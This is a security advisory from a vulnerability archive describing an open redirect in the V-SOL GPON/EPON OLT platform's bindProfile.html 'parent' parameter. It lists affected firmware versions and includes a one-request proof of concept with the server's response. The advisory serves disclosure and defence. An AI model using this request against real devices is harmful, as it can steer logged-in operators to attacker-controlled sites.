exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

V-SOL GPON/EPON OLT Platform 2.03 Link Manipulation

V-SOL GPON/EPON OLT Platform 2.03 Link Manipulation
Posted Sep 26, 2019
Authored by LiquidWorm | Site zeroscience.mk

V-SOL GPON/EPON OLT Platform version 2.03 suffers from a link manipulation vulnerability.

tags | exploit
SHA-256 | 34959f801deceff268e6addbf1c0c4604098e89e43e73873f0e8c7a3da2d1483

V-SOL GPON/EPON OLT Platform 2.03 Link Manipulation

Change Mirror Download

V-SOL GPON/EPON OLT Platform v2.03 Link Manipulation Vulnerability


Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4

Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.

Desc: Input passed via the 'parent' GET parameter in 'bindProfile.html' script
is not properly verified before being used to redirect users. This can be
exploited to redirect a logged-in user to an arbitrary website e.g. when a
user clicks a specially crafted link to the affected script hosted on a trusted
domain.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2019-5535
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5535.php

25.09.2019

--


CSRF URL Redirect request:

GET /action/bindProfile.html?parent=https://zeroscience.mk/index
Host: 192.168.8.200


Response:

HTTP/1.1 200 OK
Location: https://zeroscience.mk/index.html?select=0
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close